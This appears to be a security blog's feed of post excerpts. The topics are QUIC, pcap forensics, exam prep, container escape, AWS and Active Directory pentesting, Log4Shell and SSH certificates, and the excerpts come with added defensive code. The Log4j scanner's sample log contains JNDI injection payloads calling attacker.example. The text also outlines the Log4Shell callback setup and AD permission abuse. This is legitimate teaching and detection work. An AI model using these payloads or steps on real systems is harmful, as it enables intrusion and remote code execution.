Using a virtual environment (venv) in Python creates an isolated space for each project. Isolation ensures that each project has its own dependencies, regardless of what dependencies other projects might have.
Different projects may require different versions of libraries. Virtual environments allow you to manage these dependencies separately, avoiding conflicts.
By isolating your project environment, you ensure that global package updates or changes in one project do not break or affect other projects.
QUIC (Quick UDP Internet Connections) is a modern transport layer network protocol designed to improve the performance of applications running over the Internet. Developed by Google and standardized by the Internet Engineering Task Force (IETF), QUIC addresses some of the performance and security shortcomings of traditional protocols such as TCP and TLS/SSL. Here's a primer on its key features, benefits, and uses:
Supports multiple streams over a single connection, which helps reduce latency and prevents the "head-of-line blocking" issue that can occur in TCP when packet loss happens.
Incorporates encryption by default with TLS 1.3, ensuring that data is secure from the onset of communication and reducing the number of round trips needed to complete the handshake.
Aims to reduce connection establishment time. In some cases, it can establish a connection and secure data transfer with zero round-trip time (0-RTT) compared to TCP's 1-RTT plus an additional round-trip for TLS handshake.
Supports connection mobility, which means it can maintain a connection even if a client's IP address changes, benefiting mobile devices that switch between different networks.
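Because QUIC encrypts almost everything, the parts a network monitor can still read are the version-independent long header fields (header form bit, version, connection IDs) and a few per-version rules such as the 1200-byte minimum for Initial datagrams. The parser below is an added example written for this page, not code from the original post; the sample packets it builds are constructed (the DCID/SCID bytes and the offered version list are placeholders), and it covers both QUICv1 and QUICv2 type encodings, which the text above does not discuss.

```python
import struct
from dataclasses import dataclass, field
from typing import List, Optional

# Version numbers a monitor is likely to see. Version 0 is reserved for Version Negotiation.
KNOWN_VERSIONS = {0x00000001: "QUICv1 (RFC 9000)", 0x6B3343CF: "QUICv2 (RFC 9369)"}
# Long packet type bits (first byte, bits 5-4). v2 deliberately permutes them.
LONG_TYPES = {
    0x00000001: {0b00: "Initial", 0b01: "0-RTT", 0b10: "Handshake", 0b11: "Retry"},
    0x6B3343CF: {0b01: "Initial", 0b10: "0-RTT", 0b11: "Handshake", 0b00: "Retry"},
}
MIN_INITIAL_DATAGRAM = 1200  # RFC 9000 s14.1: a client's Initial datagram is padded to at least this


@dataclass
class LongHeader:
    version: int
    packet_type: Optional[str]                 # None when the version is unknown to us
    dcid: bytes
    scid: bytes
    offered_versions: List[int] = field(default_factory=list)  # only for Version Negotiation
    warnings: List[str] = field(default_factory=list)


def parse_long_header(datagram: bytes) -> Optional[LongHeader]:
    """Parse the version-independent long header (RFC 8999 invariants) from one UDP payload.
    Returns None when the bytes cannot be a QUIC long header packet."""
    if len(datagram) < 7 or not (datagram[0] & 0x80):    # bit 7 = 1 means long header
        return None
    version = struct.unpack("!I", datagram[1:5])[0]
    pos = 5
    dcid_len = datagram[pos]; pos += 1
    dcid = datagram[pos:pos + dcid_len]; pos += dcid_len
    if len(dcid) != dcid_len or pos >= len(datagram):
        return None
    scid_len = datagram[pos]; pos += 1
    scid = datagram[pos:pos + scid_len]; pos += scid_len
    if len(scid) != scid_len:
        return None
    hdr = LongHeader(version=version, packet_type=None, dcid=dcid, scid=scid)

    if version == 0:
        # Version Negotiation: the remainder is a list of 32-bit versions the server accepts.
        hdr.packet_type = "Version Negotiation"
        rest = datagram[pos:]
        hdr.offered_versions = [struct.unpack("!I", rest[i:i + 4])[0]
                                for i in range(0, len(rest) - len(rest) % 4, 4)]
        return hdr

    if version not in LONG_TYPES:
        hdr.warnings.append(f"unknown version 0x{version:08x}")
        return hdr
    if not (datagram[0] & 0x40):
        hdr.warnings.append("fixed bit is 0 (invalid QUIC, or another protocol sharing the port)")
    hdr.packet_type = LONG_TYPES[version][(datagram[0] >> 4) & 0x03]
    if hdr.packet_type == "Initial":
        if len(datagram) < MIN_INITIAL_DATAGRAM:
            hdr.warnings.append(f"Initial in {len(datagram)}-byte datagram; receivers must drop "
                                f"anything under {MIN_INITIAL_DATAGRAM}")
        if len(dcid) < 8:
            hdr.warnings.append("DCID shorter than 8 bytes; a client's first Initial needs at least 8")
    return hdr


def build_sample_initial(padded: bool = True) -> bytes:
    """Constructed v1 Initial header: long+fixed bits, type Initial, 8-byte DCID, empty SCID.
    The bytes after the SCID stand in for token length / length / packet number."""
    hdr = bytes([0xC0]) + b"\x00\x00\x00\x01" + b"\x08" + bytes(range(8)) + b"\x00"
    body = b"\x00" + b"\x44\x00"                       # placeholder token length and length varint
    pkt = hdr + body
    return pkt + b"\x00" * (MIN_INITIAL_DATAGRAM - len(pkt)) if padded else pkt


def build_sample_version_negotiation() -> bytes:
    """Constructed Version Negotiation packet offering v1 and v2 (SCID bytes are placeholders)."""
    return (bytes([0x80]) + b"\x00\x00\x00\x00" + b"\x00" + b"\x04" + b"\xaa\xbb\xcc\xdd"
            + b"\x00\x00\x00\x01" + b"\x6b\x33\x43\xcf")


if __name__ == "__main__":
    for sample in (build_sample_initial(), build_sample_initial(padded=False),
                   build_sample_version_negotiation()):
        print(parse_long_header(sample))
```

The warnings are the useful part for a defender: an Initial packet inside a datagram smaller than 1200 bytes is something a compliant endpoint must discard, so seeing many of them on a monitored port points at a scanner or a broken client rather than a real handshake.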
The following is a pcap analysis walkthrough for a course on network traffic analysis. Without the pcap file, this post will not make much sense. The purpose of the post is really just for class amusement. Much like the emails, it will self destruct over the weekend.
Someone connecting to a wifi router in the dorms sent harassing and threatening emails to a professor. The students who had physical possession of the router allowed a wiretap to be placed on the router to capture traffic after the first message was sent. The task is to analyze the pcap from this after the second message was received to find forensic evidence that may indicate who was responsible for sending the messages.
First, there was quite a bit of traffic to sift through and with the specific transgressions in mind, I decided to first export objects.
HTML > search "www.willselfdestruct.com"
Examined associated packets: 84366. The User-Agent looked suspicious. Looked at the MAC address. The source MAC address indicates an Apple computer (which does not jibe with the UA string).
Note: I later learned that this was not really significant due to where the sniffer was. Nonetheless, the process did not lead me in a wrong direction.
Well first, it's not rocket science. Certification exams like the ones required for Global Information Assurance Certification (GIAC), are open notes. As with any open notes exam, the information you are expected to be able to answer is so broad that merely having access to the information in paper form isn't enough. No electronics are allowed so having a method for how you will find the information you need quickly and being quite comfy with that method will be key.
There are numerous blogs out there that provide insights as to what worked for different exam takers. Some rely heavily on having a short concise index with references to which books/pages will have the answers. Others find it more helpful to put copious amounts of content into the index itself so as to avoid a second look-up in one of the course books. Color-coding your index is often advised. Some spend extra on binding their index while others simply go in with a stack of papers. Working on what is now my third index, I decided it might be worth documenting my approach and why it works for me.
Escaping a container is when a user or process breaks out from the confines of a Docker (or other type of) container to access the host machine or other containers. It's a critical concern in container security, as it could lead to unauthorized access to the host system, data leakage, or further exploitation of the network. And that would be bad. So how does it happen?
Initial Access: This blog is just exploring the container-escaping aspect of an attack. It is assumed that the attacker already has access to a container, at which point they would gather information.
Reconnaissance: Gather information about the container environment, such as the Docker version, running services, network configuration, and mounted volumes.
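The same facts an attacker gathers in the reconnaissance step are what a defender should audit before deployment, and two of them can be read directly from the container's own /proc: the effective capability mask in /proc/self/status and whether the Docker daemon socket is mounted in /proc/mounts. The script below is an added example written for this page, not the original post's code; the capability bit numbers follow the kernel's capability.h, the Docker default set is the documented `docker run` default, and the /proc/self/status and /proc/mounts text it checks is constructed sample data.

```python
from typing import Dict, List, Set

# Linux capability bit numbers in order (include/uapi/linux/capability.h, kernel 5.9+).
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill", "setgid",
    "setuid", "setpcap", "linux_immutable", "net_bind_service", "net_broadcast",
    "net_admin", "net_raw", "ipc_lock", "ipc_owner", "sys_module", "sys_rawio",
    "sys_chroot", "sys_ptrace", "sys_pacct", "sys_admin", "sys_boot", "sys_nice",
    "sys_resource", "sys_time", "sys_tty_config", "mknod", "lease", "audit_write",
    "audit_control", "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]
# What `docker run` grants without --cap-add or --privileged (CapEff 00000000a80425fb).
DOCKER_DEFAULT_CAPS = {
    "chown", "dac_override", "fowner", "fsetid", "kill", "setgid", "setuid", "setpcap",
    "net_bind_service", "net_raw", "sys_chroot", "mknod", "audit_write", "setfcap",
}


def decode_caps(hex_mask: str) -> Set[str]:
    """Turn a CapXxx hex mask from /proc/<pid>/status into capability names."""
    mask = int(hex_mask, 16)
    names = {name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)}
    # Bits newer than our table still count as granted; name them by number.
    names |= {f"cap_{bit}" for bit in range(len(CAP_NAMES), mask.bit_length()) if mask & (1 << bit)}
    return names


def parse_proc_status(text: str) -> Dict[str, Set[str]]:
    """Return {CapInh, CapPrm, CapEff, CapBnd, CapAmb} -> decoded capability names."""
    caps: Dict[str, Set[str]] = {}
    for line in text.splitlines():
        if line.startswith("Cap") and ":" in line:
            key, value = line.split(":", 1)
            caps[key] = decode_caps(value.strip())
    return caps


def audit(status_text: str, mounts_text: str) -> List[str]:
    """Flag settings that widen the container's attack surface beyond the Docker defaults."""
    findings: List[str] = []
    eff = parse_proc_status(status_text).get("CapEff", set())
    if eff >= set(CAP_NAMES):
        findings.append("full capability set in CapEff (consistent with --privileged)")
    else:
        extra = sorted(eff - DOCKER_DEFAULT_CAPS)
        if extra:
            findings.append("capabilities beyond Docker's default set: " + ", ".join(extra))
    for line in mounts_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1].endswith("docker.sock"):
            findings.append(f"Docker daemon socket mounted at {parts[1]}")
    return findings


# Constructed sample data, not captured from a real host.
SAMPLE_STATUS_DEFAULT = ("Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\n"
                         "CapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\nCapAmb:\t0000000000000000\n")
SAMPLE_STATUS_PRIV = SAMPLE_STATUS_DEFAULT.replace("00000000a80425fb", "000001ffffffffff")
SAMPLE_MOUNTS_CLEAN = "overlay / overlay rw,relatime 0 0\nproc /proc proc rw,nosuid 0 0\n"
SAMPLE_MOUNTS_SOCK = SAMPLE_MOUNTS_CLEAN + "/dev/sda1 /var/run/docker.sock ext4 rw,relatime 0 0\n"


if __name__ == "__main__":
    # Run inside a container to audit the container itself.
    with open("/proc/self/status") as f, open("/proc/mounts") as m:
        for finding in audit(f.read(), m.read()) or ["no findings"]:
            print(finding)
```

A clean result only means the two settings examined here match the defaults; seccomp and AppArmor profiles, user namespaces and the runtime version are separate checks.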
This entry is comprised of just some of the basic processes for penetration testing in Amazon Web Services. Pentesting for a tenant in a cloud environment typically has a scope that includes account security, cloud service security, application logic, and business logic. Because there are many out-of-scope aspects to a cloud pentest, the Cloud Security Alliance has created the Cloud Penetration Testing Playbook. Following the process outlined in this playbook, I'll summarize some of the steps and spend much of this post on the reconnaissance and testing portions.
dig example.com A        # Query for A records (IPv4 addresses)
dig example.com MX       # Query for MX records (mail exchange servers)
dig example.com NS       # Query for NS records (nameservers)
dig example.com SPF      # Query for SPF records (email authentication)
dig example.com TXT      # Query for TXT records (text records)
dig example.com CNAME    # Query for CNAME records (canonical name aliases)
This is essentially just notes taken as a result of listening to the informative SANS Holiday Hack Challenge 2021 speaker, Chris Davis, on Active Directory Penetration Testing and then venturing down the rabbit hole to learn more. The video is a great introduction, but these notes also include take-aways from some of the other videos Chris mentioned, including one by Tim Medin that's linked below in "Kerberoasting Tools." All very informative info.
Code Snippets
You can read the DACL of an AD group object using:
# Can use PowerView: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
# Or:
$ADSI = [ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=vulns,DC=local"
$ADSI.psbase.ObjectSecurity.GetAccessRules($true, $true, [Security.Principal.NTAccount])
# Or:
$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=vulns,DC=local"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$domainDirEntry.get_ObjectSecurity().Access
In the example below, the "GenericAll" permission is granted to the "chrisd" user on the "Domain Admins" group, provided the user you're running it under has the "WriteDACL" permission on the "Domain Admins" group.
The Log4j vulnerability is a critical security flaw that gained widespread attention in December 2021. The exploitation of the vulnerability is often called Log4Shell as it is used to gain shell access. Log4j is a logging framework that developers use to record activity within their applications. It's part of the Apache Logging Services and the library is known for its performance and flexibility, offering various logging capabilities that have become essential in software development.
The exploit takes advantage of the way Log4j processes log messages by misusing the library's Java Naming and Directory Interface (JNDI) feature. JNDI is an API in Java that allows Java software clients to look up data and resources (such as objects) via a name. The exploit occurs when a maliciously crafted log message triggers a JNDI lookup to an attacker-controlled server, leading to the execution of arbitrary code.
There are a great many applications that rely on Log4j, but one of the most notable is Apache. Once you have identified a service that is vulnerable, you can set up testing. Testing means getting an LDAP server running to handle deserialization of the exploit, which you can do through the referenced repo's .jar file. You then set up an HTTP server on the attacker host as a means of delivering the exploit. You'll also have a netcat listener set up to receive the callback once the JNDI logging executes the exploit.
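On the defensive side, the lookup string that triggers the JNDI resolution also has to land in a log somewhere, so the first thing to hunt for is `${jndi:` in access logs and header fields. Straight string matching misses the nested-lookup obfuscations that appeared almost immediately (`${${lower:j}ndi:...}`, `${::-j}`), so the scanner below reduces nested `lower`, `upper` and default-value lookups from the inside out before matching. This is an added example written for this page, not the original post's code; the access-log lines and the `attacker.example` hostname are constructed, and the resolver models only the transformations needed for detection, never performing a real lookup.

```python
import re
from typing import List, Tuple

# One innermost ${...} lookup: a body with no nested '$', '{' or '}'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The lookup we care about after normalization, matched case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(body: str) -> str:
    """Reduce one innermost lookup to the text it would yield inside Log4j."""
    head = body.lower()
    if head.startswith("lower:"):
        return body[6:].lower()
    if head.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        # Log4j default-value syntax: ${name:-default} yields 'default' when the lookup
        # fails, so ${::-j} and ${env:NOPE:-j} both reduce to "j".
        return body.split(":-", 1)[1]
    # Any other lookup (jndi, date, sys, ...) is left in place so ${jndi:...} survives.
    return "${" + body + "}"


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        reduced = _INNERMOST.sub(lambda m: _resolve_inner(m.group(1)), text)
        if reduced == text:
            break
        text = reduced
    return text


def scan_log(log: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalized line) for each line carrying a JNDI lookup."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(log.splitlines(), start=1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((lineno, norm))
    return hits


# Constructed access-log sample (not real traffic). Line 2 is the plain form, line 3 the
# nested-lookup form, line 4 a harmless lookup that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:13:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:13:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example:1389/a}"
10.0.0.9 - - [10/Dec/2021:13:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}${::-d}${env:NaN:-i}:ldap://attacker.example/b}"
10.0.0.11 - - [10/Dec/2021:13:00:04 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.8"
"""


if __name__ == "__main__":
    for lineno, norm in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {norm}")
```

Because the scanner normalizes before matching, the third sample line is reported as `${jNdi:ldap://...}` rather than being missed; any line that reaches the logger with the pattern present still only indicates an attempt, and confirming exploitation means checking whether the logging host made the corresponding outbound LDAP or HTTP connection.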
This year, I completed SANS Institute and Counter Hack's Holiday Hack Challenge. One of the speakers, Thomas Bouve, provided an excellent talk about SSH Certificates. Below are my step-by-step notes that I documented as a reference. I strongly encourage anyone interested in the topic to listen to the presentation as Thomas provides more foundational knowledge in the beginning of the video and provides more context and explanations than what I am providing here. But if you're looking for a quick copy/paste/edit of commands to get the job done, this might be a helpful reference.
Notes & Assumptions
In the example, 10.10.10.10 is the address of the server where we want to be able to SSH with a signed certificate.
The username jesinia will be used to SSH into the server.
It is assumed that the server is rootless and that jesinia has sudo permissions on the server. If you have root access, then feel free to ignore the "sudo" references.
Commands for restarting ssh service are for Fedora or RedHat distributions. If you use a different flavor of Linux, your commands may be different for that portion.
I use vim, but you can use whichever text editor you prefer.
The notes and level of detail are purposely aimed at a broader audience with less experience.